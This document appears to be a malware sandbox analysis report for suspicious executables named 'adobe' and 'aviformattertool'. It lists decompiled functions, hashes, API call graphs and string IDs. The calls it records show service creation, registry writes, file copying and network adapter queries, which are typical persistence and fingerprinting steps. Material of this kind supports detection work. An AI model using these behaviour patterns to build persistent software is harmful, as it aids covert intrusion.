                                                                                                                                                          • Opcode ID: 3a3b7b64b696b0b5eb4b2fbd0c96e19912eeadef8c9504a627da7b4bf6410b86
                                                                                                                                                          • Instruction ID: e7033022c8af971c365411b5d921d6e3ccf45ff122b41cddea678748c3bdb50c
                                                                                                                                                          • Opcode Fuzzy Hash: 3a3b7b64b696b0b5eb4b2fbd0c96e19912eeadef8c9504a627da7b4bf6410b86
                                                                                                                                                          • Instruction Fuzzy Hash: 51E02B722086442EDA0273F6BC5696B7F4CD74576CB6344BBF90882542D92D4804C97C
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 00496DB1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 31synchronizationCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                            • Part of subcall function 00406F58: DeleteFileA.KERNEL32(00000000,0049A628,00496DB9,00000000,00496E0E,?,?,00000005,?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000), ref: 00406F63
                                                                                                                                                          • ReleaseMutex.KERNEL32(00000000,00496E15,?,00000005,?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000,00496E30,?,?,00000000), ref: 00496DFF
                                                                                                                                                          • CloseHandle.KERNEL32(00000000,00000000,00496E15,?,00000005,?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000,00496E30), ref: 00496E08
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CloseDeleteFileHandleMutexRelease
                                                                                                                                                          • String ID: (rI$.lst$.msg$/REG$/REGU$Inno-Setup-RegSvr-Mutex$Setup$qI
                                                                                                                                                          • API String ID: 3841931355-2592930226
                                                                                                                                                          • Opcode ID: 06c17f9a9b5f61430471e78c46d833e475e4080508040f1a2959ed38f776375c
                                                                                                                                                          • Instruction ID: 87198f9731b1192479c04ffe538fefb058e3874758ffd048c95fd336e7cbc4ec
                                                                                                                                                          • Opcode Fuzzy Hash: 06c17f9a9b5f61430471e78c46d833e475e4080508040f1a2959ed38f776375c
                                                                                                                                                          • Instruction Fuzzy Hash: 14F0A7757086449EDF05ABA5E81296E7BB4EB48714FA3087BF414A29C0C63C5D10CE2C
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 00421D38 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 28windowCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • SetFocus.USER32(00000000,/sI,00000000,00421A84,00000000,00000000,00418608,00000000,00000001,?,?,00464BDA,00000001,00000000,00000000,0046A179), ref: 00421D5B
                                                                                                                                                          • GetFocus.USER32 ref: 00421D69
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Focus
                                                                                                                                                          • String ID: /sI
                                                                                                                                                          • API String ID: 2734777837-3342994382
                                                                                                                                                          • Opcode ID: 9e37e0b92800fb026ee4c04a9331c4adaa629c94db3b91cf1937ec1872e30d90
                                                                                                                                                          • Instruction ID: 7c51ddb3d8c31a7125e72aada4db547e67c97af2ef3b4f9e878502f62af25610
                                                                                                                                                          • Opcode Fuzzy Hash: 9e37e0b92800fb026ee4c04a9331c4adaa629c94db3b91cf1937ec1872e30d90
                                                                                                                                                          • Instruction Fuzzy Hash: EAE04831710211A7DB1036796C857EB11855B64344F55947FF546DB263DE7CDC85068C
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 00456D04 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 20timeCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • GetSystemTimeAsFileTime.KERNEL32(00000000,0049A628), ref: 00456D11
                                                                                                                                                          • FileTimeToSystemTime.KERNEL32(00000000,(rI,00000000,0049A628), ref: 00456D28
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Time$FileSystem
                                                                                                                                                          • String ID: (rI
                                                                                                                                                          • API String ID: 2086374402-3675663370
                                                                                                                                                          • Opcode ID: 38ab8112d76412924180c6dd247b02616f7c2309d52a52d931fcdc0687e5c145
                                                                                                                                                          • Instruction ID: 229b1bfa25ea94c428731b1611971c6890b9b5f6c230ce37e6a86d23df0ccc86
                                                                                                                                                          • Opcode Fuzzy Hash: 38ab8112d76412924180c6dd247b02616f7c2309d52a52d931fcdc0687e5c145
                                                                                                                                                          • Instruction Fuzzy Hash: DFD05B7340830C66CF01F1E5AC82CCFB79CD504324F100677A118A25C1FE39A654565C
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 00403344 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 9COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • GetModuleHandleA.KERNEL32(00000000,0049727E), ref: 0040334B
                                                                                                                                                          • GetCommandLineA.KERNEL32(00000000,0049727E), ref: 00403356
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CommandHandleLineModule
                                                                                                                                                          • String ID: 6r
                                                                                                                                                          • API String ID: 2123368496-4028309143
                                                                                                                                                          • Opcode ID: 746e9a92de36605cdfd87c84c822714f18c0eb0a2b64ce99e66b90c69837d839
                                                                                                                                                          • Instruction ID: 938fc5d7150061a66cd9a397de50459b98cc473a78e96f9e03329754a5f1b6bd
                                                                                                                                                          • Opcode Fuzzy Hash: 746e9a92de36605cdfd87c84c822714f18c0eb0a2b64ce99e66b90c69837d839
                                                                                                                                                          • Instruction Fuzzy Hash: 57C002A09012058AE750AFB6A84AB552A94A751349F8044BFB104BA2E2DA7D82156BDF
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 00454BA0 Relevance: 5.0, APIs: 4, Instructions: 45sleepCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: ErrorLastSleep
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 1458359878-0
                                                                                                                                                          • Opcode ID: e8daf109569e4807d71bb288e6ea8b254fe6357256af7f31b9cd7c13aeff5911
                                                                                                                                                          • Instruction ID: cc91f638363bcbeec99391655354edaee9a736831669a2751ddb7297f70e897e
                                                                                                                                                          • Opcode Fuzzy Hash: e8daf109569e4807d71bb288e6ea8b254fe6357256af7f31b9cd7c13aeff5911
                                                                                                                                                          • Instruction Fuzzy Hash: 59F0F072A00518774F24E99E9881B2F629CDAC836E710016BED09DF303D438EC8987A9
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Execution Graph

                                                                                                                                                          Execution Coverage:7.6%
                                                                                                                                                          Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                          Signature Coverage:4.8%
                                                                                                                                                          Total number of Nodes:419
                                                                                                                                                          Total number of Limit Nodes:10
                                                                                                                                                          execution_graph 2838 40b745 2841 40212f 2838->2841 2842 40b16c VirtualAlloc 2841->2842 2905 40b0c7 GetModuleFileNameA 2906 40b9aa 2905->2906 2907 402e70 12 API calls 2906->2907 2908 40b9af 2907->2908 2847 402549 2848 40b894 WaitForSingleObject 2847->2848 2849 402252 2850 402276 GetLastError 2849->2850 2852 40235e 2853 4023b0 2852->2853 2854 402365 2852->2854 2854->2853 2855 402370 GetLastError SetServiceStatus SetEvent 2854->2855 2855->2853 2856 40b060 CloseServiceHandle 2913 404ae0 2916 404ae8 2913->2916 2914 404b7a 2916->2914 2917 4049f0 RtlUnwind 2916->2917 2918 404a08 2917->2918 2918->2916 2922 4022e3 2923 40b1b8 GetModuleFileNameA 2922->2923 2925 4021e5 2926 4022e9 GetProcAddress 2925->2926 2928 40b7f6 2926->2928 2935 405ce7 2936 405cf5 2935->2936 2937 405cf9 LCMapStringW 2936->2937 2938 405cad 2936->2938 2937->2938 2939 405d11 WideCharToMultiByte 2937->2939 2939->2938 2941 404ae8 2942 404b7a 2941->2942 2943 404b06 2941->2943 2943->2942 2944 4049f0 RtlUnwind 2943->2944 2944->2943 2857 405e6b 2858 405e72 2857->2858 2859 405ea3 2858->2859 2860 405e7a MultiByteToWideChar 2858->2860 2860->2859 2861 405e93 GetStringTypeW 2860->2861 2861->2859 2862 40b673 2863 40b679 GetTickCount 2862->2863 2864 40b6a7 2863->2864 2865 402579 2866 40b976 CreateFileA CloseHandle ExitProcess 2865->2866 2945 4024f9 LoadLibraryExA 2821 40417b 2822 404187 GetCurrentProcess TerminateProcess 2821->2822 2823 404198 2821->2823 2822->2823 2824 404212 2823->2824 2825 404202 ExitProcess 2823->2825 2832 4028fd 2833 40b958 RegCreateKeyExA 2832->2833 2834 402305 2833->2834 2867 40267e 2868 40b29b GetModuleHandleA 2867->2868 2869 40277e 2872 401f64 FindResourceA 2869->2872 2871 402783 2873 401f86 GetLastError SizeofResource 2872->2873 2874 401f9f 2872->2874 2873->2874 2875 401fa6 LoadResource LockResource GlobalAlloc 2873->2875 2874->2871 2876 401fd2 2875->2876 2877 401ffb GetTickCount 2876->2877 2879 402005 GlobalAlloc 2877->2879 2879->2874 2808 40b008 CreateDirectoryA 2880 402509 ExitProcess 2881 402305 2880->2881 2809 40258b 2810 40262b RegSetValueExA 2809->2810 2811 40bbdd RegCloseKey 2810->2811 2812 40bbe3 2811->2812 2812->2812 2882 40300d 2889 40416a 2882->2889 2884 403018 2885 403026 2884->2885 2887 404bc0 7 API calls 2884->2887 2886 404bf9 7 API calls 2885->2886 2888 40302f 2886->2888 2887->2885 2890 40417b 3 API calls 2889->2890 2891 404177 2890->2891 2891->2884 2946 40228f 2947 40270f RegCloseKey 2946->2947 2949 40bbe3 2947->2949 2949->2949 2817 40b212 OpenSCManagerA 2818 40b31f 2817->2818 2819 40b493 CopyFileA 2820 4022ef 2819->2820 2956 402299 Sleep 2957 40b20b 2956->2957 2826 40261b RegQueryValueExA 2829 40b000 2826->2829 2827 40b944 2828 40b327 RegCloseKey 2828->2829 2829->2827 2829->2828 2958 40259b CreateServiceA 2959 40b1d1 CloseServiceHandle 2958->2959 2835 40219e 2836 40b26d StartServiceCtrlDispatcherA 2835->2836 2837 40b273 2836->2837 2459 402f22 GetVersion 2483 40325a HeapCreate 2459->2483 2461 402f81 2462 402f86 2461->2462 2463 402f8e 2461->2463 2558 40303d 2462->2558 2495 404842 2463->2495 2467 402f96 GetCommandLineA 2509 404710 2467->2509 2471 402fb0 2541 40440a 2471->2541 2473 402fb5 2474 402fba GetStartupInfoA 2473->2474 2554 4043b2 2474->2554 2476 402fcc GetModuleHandleA 2478 402ff0 2476->2478 2564 404159 2478->2564 2484 4032b0 2483->2484 2485 40327a 2483->2485 2484->2461 2571 403112 2485->2571 2488 403296 2491 4032b3 2488->2491 2585 403b08 2488->2585 2489 403289 2583 4032b7 HeapAlloc 2489->2583 2491->2461 2492 403293 2492->2491 2494 4032a4 HeapDestroy 2492->2494 2494->2484 2648 402e70 2495->2648 2498 404861 GetStartupInfoA 2505 404972 2498->2505 2508 4048ad 2498->2508 2501 404999 GetStdHandle 2504 4049a7 GetFileType 2501->2504 2501->2505 2502 4049d9 SetHandleCount 2502->2467 2503 402e70 12 API calls 2503->2508 2504->2505 2505->2501 2505->2502 2506 40491e 2506->2505 2507 404940 GetFileType 2506->2507 2507->2506 2508->2503 2508->2505 2508->2506 2510 40472b GetEnvironmentStringsW 2509->2510 2511 40475e 2509->2511 2512 404733 2510->2512 2514 40473f GetEnvironmentStrings 2510->2514 2511->2512 2513 40474f 2511->2513 2516 404777 WideCharToMultiByte 2512->2516 2517 40476b GetEnvironmentStringsW 2512->2517 2515 402fa6 2513->2515 2518 4047f1 GetEnvironmentStrings 2513->2518 2519 4047fd 2513->2519 2514->2513 2514->2515 2532 4044c3 2515->2532 2521 4047ab 2516->2521 2522 4047dd FreeEnvironmentStringsW 2516->2522 2517->2515 2517->2516 2518->2515 2518->2519 2523 402e70 12 API calls 2519->2523 2524 402e70 12 API calls 2521->2524 2522->2515 2530 404818 2523->2530 2525 4047b1 2524->2525 2525->2522 2526 4047ba WideCharToMultiByte 2525->2526 2528 4047d4 2526->2528 2529 4047cb 2526->2529 2527 40482e FreeEnvironmentStringsA 2527->2515 2528->2522 2716 403061 2529->2716 2530->2527 2533 4044d5 2532->2533 2534 4044da GetModuleFileNameA 2532->2534 2746 40583b 2533->2746 2536 4044fd 2534->2536 2537 402e70 12 API calls 2536->2537 2538 40451e 2537->2538 2539 40452e 2538->2539 2540 403018 7 API calls 2538->2540 2539->2471 2540->2539 2542 404417 2541->2542 2545 40441c 2541->2545 2543 40583b 19 API calls 2542->2543 2543->2545 2544 402e70 12 API calls 2546 404449 2544->2546 2545->2544 2547 403018 7 API calls 2546->2547 2553 40445d 2546->2553 2547->2553 2548 4044a0 2549 403061 7 API calls 2548->2549 2550 4044ac 2549->2550 2550->2473 2551 402e70 12 API calls 2551->2553 2552 403018 7 API calls 2552->2553 2553->2548 2553->2551 2553->2552 2555 4043c0 2554->2555 2556 4043bb 2554->2556 2555->2476 2557 40583b 19 API calls 2556->2557 2557->2555 2559 403046 2558->2559 2560 40304b 2558->2560 2561 404bc0 7 API calls 2559->2561 2562 404bf9 7 API calls 2560->2562 2561->2560 2563 403054 ExitProcess 2562->2563 2770 40417b 2564->2770 2567 40422e 2568 40423a 2567->2568 2569 404363 UnhandledExceptionFilter 2568->2569 2570 40300a 2568->2570 2569->2570 2594 402d50 2571->2594 2574 403155 GetEnvironmentVariableA 2576 403232 2574->2576 2579 403174 2574->2579 2575 40313b 2575->2574 2577 40314d 2575->2577 2576->2577 2599 4030e5 GetModuleHandleA 2576->2599 2577->2488 2577->2489 2580 4031b9 GetModuleFileNameA 2579->2580 2581 4031b1 2579->2581 2580->2581 2581->2576 2596 404d4c 2581->2596 2584 4032d3 2583->2584 2584->2492 2586 403b15 2585->2586 2587 403b1c HeapAlloc 2585->2587 2588 403b39 VirtualAlloc 2586->2588 2587->2588 2589 403b71 2587->2589 2590 403b59 VirtualAlloc 2588->2590 2591 403c2e 2588->2591 2589->2492 2590->2589 2592 403c20 VirtualFree 2590->2592 2591->2589 2593 403c36 HeapFree 2591->2593 2592->2591 2593->2589 2595 402d5c GetVersionExA 2594->2595 2595->2574 2595->2575 2601 404d63 2596->2601 2600 4030fc 2599->2600 2600->2577 2603 404d7b 2601->2603 2605 404dab 2603->2605 2608 405aaa 2603->2608 2604 405aaa 6 API calls 2604->2605 2605->2604 2607 404d5f 2605->2607 2612 4059de 2605->2612 2607->2576 2609 405ac8 2608->2609 2611 405abc 2608->2611 2618 405d6e 2609->2618 2611->2603 2613 405a09 2612->2613 2617 4059ec 2612->2617 2614 405a25 2613->2614 2615 405aaa 6 API calls 2613->2615 2614->2617 2630 405b1f 2614->2630 2615->2614 2617->2605 2619 405db7 2618->2619 2620 405d9f GetStringTypeW 2618->2620 2622 405de2 GetStringTypeA 2619->2622 2623 405e06 2619->2623 2620->2619 2621 405dbb GetStringTypeA 2620->2621 2621->2619 2624 405ea3 2621->2624 2622->2624 2623->2624 2626 405e1c MultiByteToWideChar 2623->2626 2624->2611 2626->2624 2627 405e40 2626->2627 2627->2624 2628 405e7a MultiByteToWideChar 2627->2628 2628->2624 2629 405e93 GetStringTypeW 2628->2629 2629->2624 2631 405b6b 2630->2631 2632 405b4f LCMapStringW 2630->2632 2635 405bd1 2631->2635 2636 405bb4 LCMapStringA 2631->2636 2632->2631 2633 405b73 LCMapStringA 2632->2633 2633->2631 2634 405cad 2633->2634 2634->2617 2635->2634 2637 405be7 MultiByteToWideChar 2635->2637 2636->2634 2637->2634 2638 405c11 2637->2638 2638->2634 2639 405c47 MultiByteToWideChar 2638->2639 2639->2634 2640 405c60 LCMapStringW 2639->2640 2640->2634 2641 405c7b 2640->2641 2642 405c81 2641->2642 2644 405cc1 2641->2644 2642->2634 2643 405c8f LCMapStringW 2642->2643 2643->2634 2644->2634 2645 405cf9 LCMapStringW 2644->2645 2645->2634 2646 405d11 WideCharToMultiByte 2645->2646 2646->2634 2657 402e82 2648->2657 2651 403018 2652 403021 2651->2652 2653 403026 2651->2653 2696 404bc0 2652->2696 2702 404bf9 2653->2702 2658 402e7f 2657->2658 2660 402e89 2657->2660 2658->2498 2658->2651 2660->2658 2661 402eae 2660->2661 2663 402ed2 2661->2663 2664 402ebd 2661->2664 2662 402ecb 2666 402f11 RtlAllocateHeap 2662->2666 2668 402ed0 2662->2668 2663->2662 2663->2666 2669 402ef2 2663->2669 2664->2662 2672 403653 2664->2672 2667 402f20 2666->2667 2667->2660 2668->2660 2678 403e00 2669->2678 2671 402efd 2671->2666 2671->2667 2675 403685 2672->2675 2673 403724 2677 403733 2673->2677 2692 403a0d 2673->2692 2675->2673 2675->2677 2685 40395c 2675->2685 2677->2662 2679 403e0e 2678->2679 2680 403fcf 2679->2680 2683 403efa VirtualAlloc 2679->2683 2684 403ecb 2679->2684 2681 403b08 5 API calls 2680->2681 2681->2684 2683->2684 2684->2671 2686 40399f HeapAlloc 2685->2686 2687 40396f HeapReAlloc 2685->2687 2688 4039c5 VirtualAlloc 2686->2688 2689 4039ef 2686->2689 2687->2689 2690 40398e 2687->2690 2688->2689 2691 4039df HeapFree 2688->2691 2689->2673 2690->2686 2691->2689 2693 403a1f VirtualAlloc 2692->2693 2695 403a68 2693->2695 2695->2677 2697 404bca 2696->2697 2698 404bf9 7 API calls 2697->2698 2701 404bf7 2697->2701 2699 404be1 2698->2699 2700 404bf9 7 API calls 2699->2700 2700->2701 2701->2653 2704 404c0c 2702->2704 2703 404d23 2706 404d36 GetStdHandle WriteFile 2703->2706 2704->2703 2705 404c4c 2704->2705 2710 40302f 2704->2710 2707 404c58 GetModuleFileNameA 2705->2707 2705->2710 2706->2710 2708 404c70 2707->2708 2711 405857 2708->2711 2710->2498 2712 405864 LoadLibraryA 2711->2712 2714 4058a6 2711->2714 2713 405875 GetProcAddress 2712->2713 2712->2714 2713->2714 2715 40588c GetProcAddress GetProcAddress 2713->2715 2714->2710 2715->2714 2717 403089 2716->2717 2718 40306d 2716->2718 2717->2528 2719 403077 2718->2719 2720 40308d 2718->2720 2722 4030b9 HeapFree 2719->2722 2723 403083 2719->2723 2721 4030b8 2720->2721 2724 4030a7 2720->2724 2721->2722 2722->2717 2727 40332a 2723->2727 2733 403dbb 2724->2733 2728 403368 2727->2728 2732 40361e 2727->2732 2729 403564 VirtualFree 2728->2729 2728->2732 2730 4035c8 2729->2730 2731 4035d7 VirtualFree HeapFree 2730->2731 2730->2732 2731->2732 2732->2717 2734 403de8 2733->2734 2735 403dfe 2733->2735 2734->2735 2737 403ca2 2734->2737 2735->2717 2740 403caf 2737->2740 2738 403d5f 2738->2735 2739 403cd0 VirtualFree 2739->2740 2740->2738 2740->2739 2742 403c4c VirtualFree 2740->2742 2743 403c69 2742->2743 2744 403c99 2743->2744 2745 403c79 HeapFree 2743->2745 2744->2740 2745->2740 2747 405844 2746->2747 2748 40584b 2746->2748 2750 405477 2747->2750 2748->2534 2757 405610 2750->2757 2754 4054ba GetCPInfo 2755 4054ce 2754->2755 2756 405604 2755->2756 2762 4056b6 GetCPInfo 2755->2762 2756->2748 2758 405630 2757->2758 2759 405620 GetOEMCP 2757->2759 2760 405635 GetACP 2758->2760 2761 405488 2758->2761 2759->2758 2760->2761 2761->2754 2761->2755 2761->2756 2763 4056d9 2762->2763 2769 4057a1 2762->2769 2764 405d6e 6 API calls 2763->2764 2765 405755 2764->2765 2766 405b1f 9 API calls 2765->2766 2767 405779 2766->2767 2768 405b1f 9 API calls 2767->2768 2768->2769 2769->2756 2771 404187 GetCurrentProcess TerminateProcess 2770->2771 2772 404198 2770->2772 2771->2772 2773 402ff9 2772->2773 2774 404202 ExitProcess 2772->2774 2773->2567 2775 401f27 2776 401f3c 2775->2776 2779 401a1d 2776->2779 2778 401f45 2780 401a2c 2779->2780 2785 401a4f CreateFileA 2780->2785 2784 401a3e 2784->2778 2786 401a35 2785->2786 2792 401a7d 2785->2792 2793 401b4b LoadLibraryA 2786->2793 2787 401a98 DeviceIoControl 2787->2792 2789 401b3a FindCloseChangeNotification 2789->2786 2790 401b0e GetLastError 2790->2789 2790->2792 2792->2787 2792->2789 2792->2790 2802 402cb6 2792->2802 2805 402ca8 2792->2805 2794 401c21 2793->2794 2795 401b6e GetProcAddress 2793->2795 2794->2784 2796 401b85 2795->2796 2797 401c18 FreeLibrary 2795->2797 2798 401b95 GetAdaptersInfo 2796->2798 2799 402cb6 7 API calls 2796->2799 2800 401c15 2796->2800 2801 402ca8 12 API calls 2796->2801 2797->2794 2798->2796 2799->2796 2800->2797 2801->2796 2803 403061 7 API calls 2802->2803 2804 402cbf 2803->2804 2804->2792 2806 402e82 12 API calls 2805->2806 2807 402cb3 2806->2807 2807->2792 2961 4027a8 2962 4027ad 2961->2962 2963 40b679 GetTickCount 2962->2963 2964 40b6a7 2963->2964 2965 4026ac 2967 40262c 2965->2967 2966 40bbdd RegCloseKey 2968 40bbe3 2966->2968 2967->2965 2967->2966 2968->2968 2892 405c33 2893 405c42 2892->2893 2894 405c47 MultiByteToWideChar 2893->2894 2895 405cad 2893->2895 2894->2895 2896 405c60 LCMapStringW 2894->2896 2896->2895 2897 405c7b 2896->2897 2898 405c81 2897->2898 2900 405cc1 2897->2900 2898->2895 2899 405c8f LCMapStringW 2898->2899 2899->2895 2900->2895 2901 405cf9 LCMapStringW 2900->2901 2901->2895 2902 405d11 WideCharToMultiByte 2901->2902 2902->2895 2972 4023b3 RegisterServiceCtrlHandlerA 2973 4023d6 2972->2973 2974 4024cc 2972->2974 2975 4023e4 SetServiceStatus GetLastError CreateEventA 2973->2975 2976 40245d SetServiceStatus CreateThread WaitForSingleObject CloseHandle 2975->2976 2977 40243e GetLastError 2975->2977 2978 4024c3 SetServiceStatus 2976->2978 2977->2978 2978->2974 2979 40b3b3 2980 40b4a0 wsprintfA 2979->2980 2981 40b729 2980->2981 2904 40b139 CreateThread 2982 40b4b9 GetModuleHandleA GetModuleFileNameW 2983 40bb9f 2982->2983 2830 4028bc RegOpenKeyExA 2831 40b029 2830->2831 2984 40b1be 2985 40b43e RegSetValueExA RegCloseKey 2984->2985 2986 40bb92 SetEvent 2985->2986

                                                                                                                                                          Executed Functions

                                                                                                                                                          Function 00401B4B Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 74libraryloaderCOMMON
                                                                                                                                                          Download Yara Rule

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          APIs
                                                                                                                                                          • LoadLibraryA.KERNELBASE(iphlpapi.dll), ref: 00401B5D
                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,GetAdaptersInfo), ref: 00401B74
                                                                                                                                                          • GetAdaptersInfo.IPHLPAPI(?,00000400), ref: 00401B9D
                                                                                                                                                          • FreeLibrary.KERNEL32(00401A3E), ref: 00401C1B
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000002.00000002.1663172957.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000002.00000002.1663172957.0000000000409000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_aviformattertool.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Library$AdaptersAddressFreeInfoLoadProc
                                                                                                                                                          • String ID: GetAdaptersInfo$iphlpapi.dll$o
                                                                                                                                                          • API String ID: 514930453-3667123677
                                                                                                                                                          • Opcode ID: ccb5438453e322dee9fbf1b1f0840e02b8e5c840e37394e15fd7fcb2dc755fc2
                                                                                                                                                          • Instruction ID: 989bf52404031a28807fba390b80e1364536d7dfce6c2044dfeb9dc774225594
                                                                                                                                                          • Opcode Fuzzy Hash: ccb5438453e322dee9fbf1b1f0840e02b8e5c840e37394e15fd7fcb2dc755fc2
                                                                                                                                                          • Instruction Fuzzy Hash: F521B870944209AFEF21DF65C9447EF7BB8EF41344F1440BAE504B22E1E7789985CB69
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 00401A4F Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 94fileCOMMON
                                                                                                                                                          Download Yara Rule

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          • Executed
                                                                                                                                                          • Not Executed
